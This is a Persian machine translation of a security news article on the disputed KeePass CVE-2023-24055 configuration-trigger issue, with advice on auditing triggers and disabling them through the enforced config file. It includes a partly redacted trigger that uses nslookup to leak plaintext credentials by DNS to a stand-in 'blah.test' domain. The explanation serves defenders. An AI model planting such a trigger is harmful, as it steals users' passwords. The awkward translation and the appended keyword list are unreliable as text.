چند هفته خبر برای مدیران رمز عبور بوده است – آن ابزارهای مفیدی که به شما کمک می کنند برای هر وب سایتی که استفاده می کنید رمز عبور متفاوتی پیدا کنید و سپس همه آنها را پیگیری کنید.
در پایان سال 2022، نوبت LastPass بود که همه اخبار را در بر بگیرد، زمانی که این شرکت در نهایت اعتراف کرد که نقضی که در آگوست 2022 متحمل شده بود، واقعاً به رمز عبور مشتریان ختم شده است. طاق ها به سرقت می روند از سرویس ابری که در آن پشتیبان گرفته شده اند.
(خود رمزهای عبور به سرقت نرفتند، زیرا مخازن رمزگذاری شده بودند، و LastPass کپیهایی از «کلید اصلی» کسی برای خود فایلهای صندوق پشتیبان نداشت، اما تراشیدن نزدیکتر از آن چیزی بود که اکثر مردم از شنیدن آن خوشحال بودند.)
سپس نوبت LifeLock بود که همه اخبار را منتشر کند، زمانی که این شرکت در مورد چیزی که شبیه یک راش به نظر می رسید هشدار داد. حملات حدس زدن رمز عبور، احتمالاً بر اساس رمزهای عبور دزدیده شده از یک وب سایت کاملاً متفاوت، احتمالاً مدتی پیش، و احتمالاً اخیراً در وب تاریک خریداری شده است.
خود LifeLock نقض نشده بود، اما برخی از کاربران آن به لطف رفتار به اشتراک گذاری رمز عبور ناشی از خطراتی که ممکن است حتی به یاد نداشته باشند، نقض شده بود.
رقبای 1Password و BitWarden نیز اخیراً بر اساس گزارشهایی مبنی بر تبلیغات مخربی که ظاهراً ناخواسته توسط Google پخش شدهاند، در اخبار بودهاند که کاربران را به طور متقاعدکنندهای به سمت کپی کردن صفحات ورود به سیستم با هدف فیش کردن جزئیات حساب خود میکشاند.
حالا نوبت KeePass است در اخبار، این بار برای یکی دیگر از مسائل امنیت سایبری: ادعایی آسیب پذیری، اصطلاحی است که برای اشکالات نرم افزاری استفاده می شود که منجر به حفره های امنیت سایبری می شود که مهاجمان ممکن است بتوانند از آنها برای اهداف شیطانی سوء استفاده کنند.
پیدا کردن رمز عبور آسان شده است
ما به آن به عنوان یک اشاره می کنیم آسیب پذیری در اینجا زیرا دارای شناسه رسمی اشکال است که توسط موسسه ملی استاندارد و فناوری ایالات متحده صادر شده است.
باگ دوبله شده است CVE-2023-24055: مهاجمی که دسترسی نوشتن به فایل پیکربندی XML دارد [می تواند] رمزهای عبور متن واضح را با افزودن یک محرک صادراتی به دست آورد.
متأسفانه ادعای امکان به دست آوردن رمزهای عبور واضح است.
اگر دسترسی نوشتن به فایل های شخصی شما داشته باشم، از جمله به اصطلاح شما %APPDATA%
دایرکتوری، میتوانم یواشکی بخش پیکربندی را تغییر دهم تا تنظیمات KeePass را که قبلاً سفارشی کردهاید تغییر دهم، یا اگر آگاهانه چیزی را تغییر ندادهاید، سفارشیسازیها را اضافه کنم…
و من می توانم به طور شگفت انگیزی به راحتی رمزهای عبور متن ساده شما را بدزدم، یا به صورت انبوه، برای مثال با ریختن کل پایگاه داده به عنوان یک فایل CSV رمزگذاری نشده، یا زمانی که شما از آنها استفاده می کنید، برای مثال با تنظیم یک "قلاب برنامه" که هر بار که به یک فایل دسترسی پیدا می کنید فعال می شود. رمز عبور از پایگاه داده
توجه داشته باشید که من نیازی ندارم مدیر امتیازات، زیرا من نیازی به درگیر شدن با دایرکتوری نصب واقعی که در آن برنامه KeePass در آن ذخیره می شود، که معمولاً برای کاربران عادی غیرمجاز است.
و من نیازی به دسترسی به تنظیمات پیکربندی جهانی قفل شده ندارم.
جالب اینجاست که KeePass برای جلوگیری از شناسایی رمزهای عبور شما هنگام استفاده از آنها، از جمله استفاده از تکنیکهای محافظت در برابر دستکاری برای جلوگیری از ترفندهای مختلف ضد کی لاگر حتی از سوی کاربرانی که قبلاً دارای قدرت سیستمعامل هستند، تلاش میکند.
اما نرمافزار KeePass گرفتن دادههای رمز عبور متن ساده را نیز به طرز شگفتآوری آسان میکند، شاید به روشهایی که ممکن است «بسیار آسان» در نظر بگیرید، حتی برای افراد غیر سرپرست.
استفاده از رابط کاربری گرافیکی KeePass برای ایجاد یک یک دقیقه کار بود ماشه رویدادی که هر بار که رمز عبور را در کلیپ بورد کپی میکنید اجرا میشود و آن رویداد را برای انجام جستجوی DNS که شامل نام کاربری و رمز عبور متن ساده مورد نظر است، تنظیم کنید:
سپس میتوانیم تنظیمات XML نه چندان واضح آن گزینه را از فایل پیکربندی محلی خود در فایل پیکربندی کاربر دیگری در سیستم کپی کنیم، پس از آن آنها نیز متوجه میشوند که رمزهای عبور خود از طریق اینترنت از طریق جستجوهای DNS درز کرده است.
اگرچه داده های پیکربندی XML تا حد زیادی قابل خواندن و آموزنده است، KeePass به طور عجیبی از رشته های داده تصادفی معروف به GUID (مخفف شناسه های منحصر به فرد جهانی) برای نشان دادن انواع مختلف ماشه تنظیمات، به طوری که حتی یک کاربر آگاه به یک لیست مرجع گسترده نیاز دارد تا بفهمد کدام محرک ها و چگونه تنظیم شده اند.
راهانداز نشت DNS ما چگونه به نظر میرسد، اگرچه ما برخی از جزئیات را ویرایش کردهایم تا فقط با کپی کردن و چسباندن مستقیم این متن، نتوانید با هیچ مشکلی روبرو شوید:
XXXXXXXXXXXXXXXXXX کپی 🀄 سرقت موارد از طریق جستجوهای DNS XXXXXXXXXXXXXXXXXX 0XXXXXXXXXXXXXXXXXX nslookup XXXXXX.XXXXXX.blah.test درست است، واقعی 1
با فعال بودن این ماشه، دسترسی به رمز عبور KeePass باعث می شود متن ساده در یک جستجوی DNS محجوب به دامنه انتخابی من نشت کند. blah.test
در این مثال
توجه داشته باشید که مهاجمان واقعی تقریباً به طور قطع متن دزدیده شده را درهم میزنند یا مبهم میکنند، که نه تنها تشخیص درز DNS را سختتر میکند، بلکه از گذرواژههای حاوی کاراکترهای غیرASCII، مانند حروف برجسته یا ایموجیها نیز مراقبت میکنند. که در غیر این صورت نمی توان در نام های DNS استفاده کرد:
اما آیا واقعا یک باگ است؟
اما سوال پیچیده این است که "آیا این واقعا یک اشکال است، یا فقط یک ویژگی قدرتمند است که می تواند توسط شخصی مورد سوء استفاده قرار گیرد که حداقل به اندازه شما به کنترل فایل های خصوصی شما نیاز دارد؟"
به بیان ساده، آیا اگر شخصی که از قبل کنترل حساب شما را در دست دارد، بتواند با فایل هایی که حساب شما به هر حال قرار است به آنها دسترسی داشته باشد، آسیب پذیر است؟
حتی اگر ممکن است امیدوار باشید که یک مدیر pssword لایههای بیشتری از محافظت در برابر دستکاری را شامل شود تا سوء استفاده از باگها/ویژگیهای این نوع را سختتر کند. CVE-2023-24055 آیا واقعاً یک آسیب پذیری فهرست شده در CVE است؟
اگر چنین است، دستوراتی مانند DEL
(یک فایل را حذف کنید) و FORMAT
باید "اشکالات" نیز باشد؟
و آیا وجود PowerShell که تحریک رفتارهای بالقوه خطرناک را بسیار آسانتر میکند (سعی کنید powerhsell get-clipboard
به عنوان مثال)، یک آسیب پذیری برای خودش باشد؟
این موضع KeePass است که با متن زیر که به آن اضافه شده است تأیید شده است. جزئیات "اشکال". در وب سایت NIST:
** مورد بحث ** […] توجه: موضع فروشنده این است که پایگاه داده رمز عبور در برابر مهاجمی که این سطح از دسترسی به رایانه شخصی محلی را دارد، ایمن نیست.
چه کاری انجام دهید؟
اگر کاربر مستقل KeePass هستید، میتوانید با باز کردن برنامه KeePass و مطالعه آن، تریگرهای سرکش مانند «DNS Stealer» را که در بالا ایجاد کردیم، بررسی کنید. ابزار > محرک ها… پنجره:
توجه داشته باشید که می توانید کل را بچرخانید ماشه سیستم را از این پنجره، به سادگی با حذف کردن علامت [ ] Enable trigger system
گزینه…
... اما این یک تنظیم جهانی نیست، بنابراین می توان آن را دوباره از طریق فایل پیکربندی محلی خود روشن کرد، و بنابراین فقط از شما در برابر اشتباهات محافظت می کند، نه از مهاجمی که به حساب شما دسترسی دارد.
میتوانید با تغییر فایل جهانی «قفل کردن»، این گزینه را برای همه افراد در رایانه خاموش کنید، بدون اینکه گزینهای برای بازگرداندن آن به خودشان وجود داشته باشد. KeePass.config.enforced.XML
، در فهرستی که خود برنامه برنامه در آن نصب شده است یافت می شود.
اگر فایل اجرایی XML جهانی شما به این شکل باشد، تریگرها برای همه غیرفعال می شوند:
نادرست
(در صورت تعجب، مهاجمی که برای معکوس کردن این تغییر به دایرکتوری برنامه دسترسی دارد، تقریباً مطمئناً قدرت کافی در سطح سیستم برای اصلاح خود فایل اجرایی KeePass یا نصب و فعال کردن یک کی لاگر مستقل را دارد.)
اگر مدیر شبکه ای هستید که وظیفه دارید KeePass را روی رایانه های کاربران خود قفل کنید تا همچنان به اندازه کافی انعطاف پذیر باشد تا به آنها کمک کند، اما آنقدر انعطاف پذیر نیست که آنها به اشتباه به مجرمان سایبری کمک کنند، توصیه می کنیم KeePass را مطالعه کنید. مسائل امنیتی صفحه ، محرک صفحه، و پیکربندی اجباری احتمال برد مراجعه کنید.
- محتوای مبتنی بر SEO و توزیع روابط عمومی. امروز تقویت شوید.
- پلاتوبلاک چین. Web3 Metaverse Intelligence. دانش تقویت شده دسترسی به اینجا.
- منبع: https://nakedsecurity.sophos.com/2023/02/01/password-stealing-vulnerability-reported-in-keypass-bug-or-feature/
- 1
- 2022
- 70
- a
- قادر
- درباره ما
- بالاتر
- مطلق
- دسترسی
- دسترسی
- حساب
- فعال
- اضافه
- پذیرفته
- آگهی
- پس از
- در برابر
- معرفی
- ادعا شده است
- قبلا
- و
- دیگر
- نرم افزار
- کاربرد
- اوت
- نویسنده
- خودکار
- به عقب
- حمایت کرد
- تصویر پس زمینه
- پشتیبان گیری
- مستقر
- زیرا
- بودن
- مرز
- پایین
- شکاف
- اشکال
- اشکالات
- گرفتن
- اهميت دادن
- مورد
- ایجاد می شود
- علل
- مرکز
- قطعا
- تغییر دادن
- کاراکتر
- بررسی
- انتخاب
- ادعا
- نزدیک
- ابر
- رنگ
- بیا
- شرکت
- به طور کامل
- کامپیوتر
- کامپیوتر
- شرایط
- پیکر بندی
- در نظر بگیرید
- کنترل
- نسخه
- میتوانست
- پوشش
- ایجاد
- ایجاد شده
- cve
- مجرمان سایبری
- امنیت سایبری
- خطرناک
- تاریک
- وب سایت تیره
- داده ها
- پایگاه داده
- جزئیات
- DID
- مختلف
- مستقیما
- نمایش دادن
- دی ان اس
- دامنه
- آیا
- پایین
- دوبله شده
- آسان تر
- به آسانی
- هر دو
- رمزگذاری
- اجرای
- کافی
- تمام
- حتی
- واقعه
- هر
- هر کس
- مثال
- بهره برداری
- صادرات
- وسیع
- اضافی
- ویژگی
- کمی از
- پرونده
- فایل ها
- سرانجام
- پیدا کردن
- قابل انعطاف
- پیروی
- استحکام
- یافت
- از جانب
- دریافت کنید
- گرفتن
- جهانی
- می رود
- گوگل
- سیار
- خوشحال
- داشتن
- ارتفاع
- کمک
- اینجا کلیک نمایید
- سوراخ
- امید
- در تردید بودن
- چگونه
- اما
- HTML
- HTTPS
- شناسه
- فوری
- in
- شامل
- مشمول
- از جمله
- حاوی اطلاعات مفید
- نصب
- نمونه
- موسسه
- اینترنت
- موضوع
- صادر
- IT
- خود
- اصطلاحات مخصوص یک صنف
- نگاه داشتن
- شناخته شده
- تا حد زیادی
- برنامه LastPass
- لایه
- رهبری
- نشت
- نشت
- سطح
- فهرست
- محلی
- نگاه
- مطالب
- مراجعه
- ساخته
- ساخت
- باعث می شود
- مدیر
- مدیران
- حاشیه
- حداکثر عرض
- قدرت
- اشتباه
- اشتباهات
- تغییر
- اکثر
- نام
- ملی
- نیاز
- شبکه
- اخبار
- نیست
- طبیعی
- گرفتن
- رسمی
- افتتاح
- گزینه
- در غیر این صورت
- خود
- پارامتر
- کلمه عبور
- کلمه عبور
- پل
- PC
- مردم
- شاید
- شخصی
- فیشینگ
- متن ساده
- افلاطون
- هوش داده افلاطون
- PlatoData
- موقعیت
- پست ها
- بالقوه
- قدرت
- قوی
- قدرت
- PowerShell را
- خصوصی
- امتیازات
- شاید
- برنامه
- خریداری شده
- اهداف
- قرار دادن
- سوال
- تصادفی
- جوش
- مطالعه
- تازه
- توصیه
- منظم
- به یاد داشته باشید
- پاسخ
- گزارش
- گزارش ها
- معکوس
- خطرات
- دویدن
- بخش
- امن
- حس
- سرویس
- تنظیم
- محیط
- تنظیمات
- کوتاه
- باید
- به سادگی
- So
- نرم افزار
- جامد
- برخی از
- کسی
- Spot
- مستقل
- استانداردهای
- هنوز
- به سرقت رفته
- توقف
- ذخیره شده
- چنین
- مفروض
- SVG
- سیستم
- گرفتن
- تکنیک
- پیشرفته
- La
- شان
- خودشان
- از این رو
- از طریق
- زمان
- به
- هم
- بالا
- مسیر
- انتقال
- شفاف
- ماشه
- درست
- دور زدن
- تبدیل
- به طور معمول
- منحصر به فرد
- URL
- us
- استفاده کنید
- کاربر
- کاربران
- آب و برق
- مختلف
- طاق
- خزانه ها
- از طريق
- آسیب پذیری
- W3
- راه
- وب
- سایت اینترنتی
- هفته
- چی
- که
- WHO
- اراده
- تعجب کردم
- مهاجرت کاری
- خواهد بود
- نوشتن
- XML
- شما
- خودت
- زفیرنت